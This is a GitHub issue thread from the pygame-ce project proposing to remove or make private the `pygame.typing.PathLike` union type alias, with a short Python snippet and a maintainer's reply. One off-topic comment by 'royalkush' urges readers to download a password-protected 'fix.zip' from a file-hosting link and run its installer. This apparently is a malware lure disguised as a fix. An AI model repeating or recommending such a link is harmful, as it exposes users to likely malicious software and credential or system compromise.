### ISSUE TITLE
Proposal: Remove `pygame.typing.PathLike` type from the API

### ISSUE THREAD

**Issue by aatle** [pygame-community/pygame-ce#3085]
From the discussion in #3080, I think it may be a good idea to remove [`typing.PathLike`](https://github.com/pygame-community/pygame-ce/blob/e01a44e1481af73ccd1fca0dc0ab78e9257cd47e/src_py/typing.py#L32) union type alias.
Here are some arguments for removing it *or* making it internal:
- The pygame typing API has not been released yet (2.5.2); it is easier to add `PathLike` back in if it is useful than it is to remove `PathLike` if it is unnecessary
- Only used in one place in pygame other than in `typing.FileLike`: inside [`rwobject.pyi`](https://github.com/pygame-community/pygame-ce/blob/e01a44e1481af73ccd1fca0dc0ab78e9257cd47e/buildconfig/stubs/pygame/rwobject.pyi) as the parameter type for `encode_string()` and `encode_file_path()`. Though there could be more undiscovered uses
- This specific union is too general; not very specific to pygame (unlike `FileLike`)
  - Was considered for addition to standard typing module in [PEP 519](https://peps.python.org/pep-0519/#provide-specific-type-hinting-support), but ultimately not added
  - Currently exists as one of the stable `_typeshed` types: [`StrOrBytesPath`](https://github.com/python/typeshed/blob/f58dac1d62d33bb2255b762783d06463c40f5065/stdlib/_typeshed/__init__.pyi#L176)
- Slight name conflict with `os.PathLike`, which is used in the definition of `pygame.typing.PathLike` (confusing?)

___
Also proposing a separate but related *internal* change: Still use `os.PathLike` for python <=3.8 (where it is not generic), by defining the other type in the version conditional, as so:
```python
if sys.version_info >= (3, 9):
    PathLike = Union[str, bytes, _PathProtocol[str], _PathProtocol[bytes]]
else:
    PathLike = Union[str, bytes, _PathProtocol]
```
This is so we don't have to define a custom internal protocol class with the same behavior as `os.PathLike`.

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ankith26** [comment]
I think the easiest solution here is to undocument it and make it private for now, and keep using it in the implementation
